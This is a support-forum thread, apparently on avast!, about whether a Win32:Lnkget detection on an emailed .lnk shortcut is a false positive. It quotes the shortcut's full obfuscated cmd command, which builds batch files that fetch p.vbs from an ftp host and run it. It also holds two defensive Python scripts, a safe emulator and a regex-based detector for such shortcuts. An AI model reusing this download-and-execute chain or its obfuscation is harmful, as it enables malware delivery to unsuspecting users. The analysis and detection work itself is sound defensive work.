There are 9 out of 41 antivirus software products reporting that this email contains a malware link. The other 32 consider this email clean. How can I tell whether or not it is a false positive?
Hi,
You can send this file to us using the avast! warning dialog, as shown in the picture below, and we will analyze it. If it is a false positive, we will fix it.
Hi,
It looks like your email contains an attachment with a shortcut (a file with the .lnk extension) that looks like the picture below (right click → Properties). See the part called “Target”. If it looks similar, it’s not a false positive.
There are two identical lnk shortcuts (but with different lnk names) attached to the suspected email. For your reference, I have copied their “Target” settings here:
lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&
Are these scripts supposed to download stuff and even execute some of it on my system? But my question is how to tell whether these scripts will do real damage to my system, such as deleting system files, altering the Windows registry, or opening a back door as a Trojan. Could my XP system be so vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 antivirus software products from VirusTotal check it and let it pass?
Hi dude2,
The script in the “Target” creates a script for ftp (address ftp.g03z.com) with the username and password filled in, tries to download the file “p” and store it as “p.vbs” in %windir% (from the shortcut property “Start in”), and then runs “p.vbs”. But the file “p” doesn’t exist on the ftp server at this time, so “p.vbs” is empty and does nothing (no real damage to your system).
Why do the other antivirus software products from VirusTotal check it and let it pass? I don’t know, maybe they didn’t analyze this file.
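Milos's reading of the “Target” string can be checked without ever running it. The Python script below is an added example, not part of this thread and not avast! code: it emulates only the cmd.exe features the chain relies on (echo with > and >> redirection, ^ escapes, set, call, ren, and %var% expansion, which leaves undefined names untouched on a command line but blanks them inside a .bat file) against an in-memory file system, and records rather than executes every other command. The class and function names (CmdEmulator, analyze_lnk_target, summarize) and the modelled parsing rules are my own assumptions about cmd.exe; the Target string itself is the one quoted in the post (both attached shortcuts carry the same one). Nothing here touches the disk or the network.

```python
import re

# The "Target" string quoted in the thread (both attached .lnk files carry the same one).
LNK_TARGET = (
    "%ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat"
    "&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m"
    "&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m"
    "&echo start p.vbs>>m&ren m t.bat&t.bat&"
)


class CmdEmulator:
    """Assumed model of the small cmd.exe subset the chain uses; files live in a dict."""

    def __init__(self):
        self.env = {}       # variables created with 'set' (cmd names are case-insensitive)
        self.files = {}     # virtual working directory: file name -> text
        self.actions = []   # commands that would run a real program (ftp, start, ...)

    def expand(self, text, batch):
        # cmd expands %var% before parsing a line. On the command line an undefined
        # name is left as-is; inside a .bat file it expands to an empty string.
        def repl(m):
            name = m.group(1).lower()
            if name in self.env:
                return self.env[name]
            return "" if batch else m.group(0)
        return re.sub(r"%([^%]+)%", repl, text)

    @staticmethod
    def split_commands(line):
        # Split on '&' unless it is escaped with '^'; escapes are kept for later.
        cmds, cur, i = [], "", 0
        while i < len(line):
            c = line[i]
            if c == "^" and i + 1 < len(line):
                cur += c + line[i + 1]
                i += 2
                continue
            if c == "&":
                cmds.append(cur)
                cur = ""
            else:
                cur += c
            i += 1
        cmds.append(cur)
        return [c.strip() for c in cmds if c.strip()]

    @staticmethod
    def split_redirect(cmd):
        # Return (command text, redirect target, append?) with '^' escapes resolved,
        # so that an escaped '^>' becomes literal text instead of a redirection.
        text, target, append, i = "", None, False, 0
        while i < len(cmd):
            c = cmd[i]
            if c == "^" and i + 1 < len(cmd):
                text += cmd[i + 1]
                i += 2
                continue
            if c == ">":
                append = cmd[i + 1:i + 2] == ">"
                i += 2 if append else 1
                j = i
                while j < len(cmd) and not cmd[j].isspace():
                    j += 1
                target = cmd[i:j]
                i = j
                continue
            text += c
            i += 1
        return text.strip(), target, append

    def write(self, target, data, append):
        if target is None:
            self.actions.append("echo " + data.strip())  # would only print to the console
            return
        self.files[target] = (self.files.get(target, "") if append else "") + data

    def run_batch(self, name):
        for line in self.files[name].splitlines():
            self.run_line(line, batch=True)

    def run_line(self, line, batch):
        line = self.expand(line, batch)
        for cmd in self.split_commands(line):
            self.run_command(cmd)

    def run_command(self, cmd):
        text, target, append = self.split_redirect(cmd)
        verb, _, rest = text.partition(" ")
        verb = verb.lower()
        if verb == "echo":
            self.write(target, rest + "\n", append)
        elif verb == "set":
            name, _, value = rest.partition("=")
            self.env[name.lower()] = value
        elif verb == "call" and rest in self.files:
            self.run_batch(rest)
        elif verb == "ren":
            old, _, new = rest.partition(" ")
            self.files[new] = self.files.pop(old)
        elif verb in self.files:        # running a .bat file the chain wrote itself
            self.run_batch(verb)
        else:
            self.actions.append(text)   # ftp, start, ...: recorded, never executed


def analyze_lnk_target(target):
    """Strip the %ComSpec% /c launcher and emulate the rest as one cmd.exe command line."""
    em = CmdEmulator()
    body = re.sub(r"^%comspec%\s+/c\s+", "", target, flags=re.IGNORECASE)
    em.run_line(body, batch=False)
    return em


def summarize(target):
    """Condense the emulation into what an analyst wants: ftp host, fetches, launched programs."""
    em = analyze_lnk_target(target)
    ftp_script = em.files.get("l", "").splitlines()
    hosts = [ln.split(" ", 1)[1] for ln in ftp_script if ln.lower().startswith(("o ", "open "))]
    gets = [ln.split(" ", 1)[1] for ln in ftp_script if ln.lower().startswith("get ")]
    return {"ftp_hosts": hosts, "downloads": gets, "runs": em.actions}


if __name__ == "__main__":
    em = analyze_lnk_target(LNK_TARGET)
    for name, body in em.files.items():
        print(f"--- {name} ---\n{body}", end="")
    print("would run:", em.actions)
    print(summarize(LNK_TARGET))
```

Running it prints the generated z.bat, the renamed t.bat and the ftp script “l” (open ftp.g03z.com, the two credential lines, get p p.vbs, bye), followed by the two external commands the chain would launch: ftp -s:l and start p.vbs. That is exactly the behaviour described above, recovered from the raw Target string without a Windows box and without contacting the server.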
Milos, thank you for your thorough investigation on this issue.
But here comes the hazy part of this odd problem. Suppose a friend sends me an email with an lnk which leads me to his well-arranged script procedure, and when I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because some automated scripts get executed?
Or does there need to be some harmful signature or pattern in the activities of the executed scripts which matches the Avast iAVS DB and therefore triggers the alarm? For example, the suspected scripts manipulating the system or putting users in harm’s way.
If you say that the file “p” doesn’t exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of the scripts embedded in the lnk reference. If that is the case, to me it is more like an “access-control-related issue”, and users need to set up their system wisely so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products cannot conclude this email is infected simply from finding embedded scripts, but instead need more evidence of suspicious activities?
But here comes the hazy part of this odd problem. Suppose a friend sends me an email with an lnk which leads me to his well-arranged script procedure, and when I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because some automated scripts get executed?
Yes, avast! will still detect that email -- when avast! scans that .lnk file it doesn't know whether the file on the ftp server exists. If you don't disable avast!, it won't allow you to run this script.
Or does there need to be some harmful signature or pattern in the activities of the executed scripts which matches the Avast iAVS DB and therefore triggers the alarm? For example, the suspected scripts manipulating the system or putting users in harm’s way.
Yes.
If you say that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of the scripts embedded in the lnk reference. If that is the case, to me it is more like an "access-control-related issue", and users need to set up their system wisely so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products cannot conclude this email is infected simply from finding embedded scripts, but instead need more evidence of suspicious activities?
I think it would be hard work to analyze a script in the AV engine, log in to some ftp server using data gathered from the analyzed script, check whether the file exists, download it and then check again whether it's harmful (you can see the possibility of long processing time here).
If you receive a suspected email or program which you don’t trust, you can run it in a virtual machine and see whether it does anything bad – you can then return to the state before the infection.
Yes, the lnks’ targets contain scripts, but I did not see the suspected scripts manipulating the system or putting users in harm’s way, simply because the file “p” doesn’t even exist on the remote FTP server during the test. If some of those VirusTotal-listed 32 antivirus software products that DID NOT SHOW POSITIVE come with file emulation or some heuristic analysis capability, and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execute harmless stuff, then are we safe to say it is a false positive, or maybe a little overcautious? Or do you think the test results from those 32 out of 41 AV products are false negatives?
If you look at the script, you can see that there is no direct ftp address (it is substituted at runtime) and some commands are substituted the same way, so what is the reason to do that? It is considered a malware practice to hide the real behavior, so the other AVs are false negatives.
Are those scripts at most to be considered mischievous? Or do they really manipulate the system to the extent of degrading system performance or security, or put users in harm’s way? Once that is clarified, I may concur more with the false positive or false negative conclusion.
I do not know the reason for using a substituted ftp address at runtime. But could a legitimate script or program use a similar technique? Doesn’t the Windows system itself take an ftp address as an argument on its command line or in the FTP app environment? Again, it is only my immature opinion, but can we judge a script simply by its programming techniques?
Are those scripts at most to be considered mischievous?
a) If you mean the script which is downloaded from ftp -- I don't remember. But the script is downloaded from the strange url g03z.com (you can see the owner and other properties: http://whois.domaintools.com/g03z.com or the picture below).
b) If you mean the script from the .lnk – yes.
In the case of this .lnk file, there is no reason to obfuscate the script, so it can be considered malicious, plus the WHOIS information.
A legitimate script has no reason to obfuscate the ftp address.
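Milos's point (there is no legitimate reason to assemble the host name and the command names from variables at runtime) can be turned into a static triage check that runs on the raw “Target” text alone. The Python below is an added example, not something from avast! or from this thread; the indicator names, regular expressions, threshold and verdict labels are my own, as are the two comparison targets (a plain notepad shortcut and an administrator's shortcut that calls ftp -s: with a literal script path, constructed here to answer the question above about legitimate ftp use). The obfuscated Target is the one quoted earlier in the thread.

```python
import re

# The "Target" quoted in the thread (identical in both attached .lnk files).
LNK_TARGET = (
    "%ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat"
    "&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m"
    "&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m"
    "&echo start p.vbs>>m&ren m t.bat&t.bat&"
)

# Constructed comparison targets (not from the thread): an ordinary shortcut and a
# legitimate-looking admin shortcut that drives the Windows ftp client with a literal path.
BENIGN_TARGET = r"C:\Windows\System32\notepad.exe"
ADMIN_FTP_TARGET = r"%ComSpec% /c ftp -s:C:\scripts\sync.txt"

# Indicator name -> regex matched case-insensitively against the raw Target string.
INDICATORS = {
    # shortcut launches the command interpreter rather than a program
    "cmd_launcher": r"^(?:%comspec%|cmd(?:\.exe)?)\s+/[ck]\b",
    # the chain writes a .bat file of its own, i.e. code generated at click time
    "builds_batch_file": r">>?\s*[\w.]+\.bat\b",
    # a %var% spliced into the middle of a token: the host or command name is
    # only assembled at runtime, which is the obfuscation Milos describes
    "var_inside_token": r"[a-z0-9]%[^%\s]+%[a-z0-9]",
    # use of the ftp client (legitimate admins do this too, so this alone is weak)
    "ftp_client": r"\bftp\b",
    # launching a script host or a freshly written script file
    "launches_script": r"\bstart\s+\S+\.(?:vbs|js|bat|cmd)\b|\b[wc]script\b",
}

CHAIN_THRESHOLD = 5  # assumed: this many '&'-joined commands in one shortcut is unusual


def lnk_target_indicators(target, chain_threshold=CHAIN_THRESHOLD):
    """Return the names of all indicators that fire on one shortcut Target string."""
    found = [name for name, rx in INDICATORS.items()
             if re.search(rx, target, re.IGNORECASE)]
    if target.count("&") >= chain_threshold:
        found.append("long_command_chain")
    return found


def triage(target):
    """Map the indicator set to a coarse verdict; runtime-assembled names alone are decisive."""
    hits = lnk_target_indicators(target)
    if not hits:
        return "clean"
    if "var_inside_token" in hits or len(hits) >= 4:
        return "likely malicious"
    return "review"


if __name__ == "__main__":
    for label, t in [("benign", BENIGN_TARGET), ("admin ftp", ADMIN_FTP_TARGET),
                     ("thread sample", LNK_TARGET)]:
        print(f"{label:13} {triage(t):17} {lnk_target_indicators(t)}")
```

The administrator's shortcut trips only the weak indicators (it runs cmd and it uses ftp), while the sample from the thread trips every one, including the spliced-variable check that has no benign explanation. That is the distinction Milos draws: using the ftp client is fine, hiding which host it connects to is not.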
There is no argument that the site administrator’s identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in an lnk, especially doing ftp and downloading stuff. But what trait makes it more than just suspicious or somewhat obfuscated, yet honored enough to join the Avast! iAVS/VPS, still baffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security, or to put users in harm’s way.
As I questioned in #11, if an embedded script was downloading harmless stuff, or even failed to download anything because the target file on the ftp server was not there, then can we still categorize this script as a Trojan Downloader, Trojan Dropper, or any type of Trojan? I am trying to understand what type of Trojan Win32:Lnkget is. If Win32:Lnkget was overcautious about suspicious downloading activities, should we count it as a false positive?
Based on Alwil’s VPS record, when Avast initially captured and categorized this as the Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Even if there was something downloaded that triggered Avast back then, how can it still trigger Avast to generate an alarm now, when there is no file to download?
Yes, we can still categorize this script as a Trojan, because we don't know whether the file will appear on the ftp server in the future.
Based on Alwil's VPS record, when Avast initially captured and categorized this as the Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Who knows ...
Even if there was something downloaded that triggered Avast back then, how can it still trigger Avast to generate an alarm now, when there is no file to download?
Malicious activity detection is another approach used to identify malware. In this approach, antivirus software monitors the system for suspicious program behavior. If suspicious behavior is detected, the suspect program may be further investigated, using signature based detection or another method listed in this section. This type of detection can be used to identify unknown viruses or variants on existing viruses.
<<
All referenced links pointed to the key idea:
“It takes a little more investigation to distinguish a malware from a suspicious false positive.”
Normally, this investigation will reveal the true identity of the suspicious script. According to Viruslist.com, a Trojan dropper/downloader is identified by either a dangerous payload or a malware/adware component, with the help of a signature or other methods. I suspect that could be the reason some 32 out of 41 AV software products would not categorize it as a Trojan downloader/dropper when this script cannot be downloaded from the ftp server for further investigation.
If Alwil is not about to provide the key info about what damaging-activity signature it had when Win32:Lnkget was first created, then who knows? I may have to rest my case here. Your help thus far is appreciated nonetheless.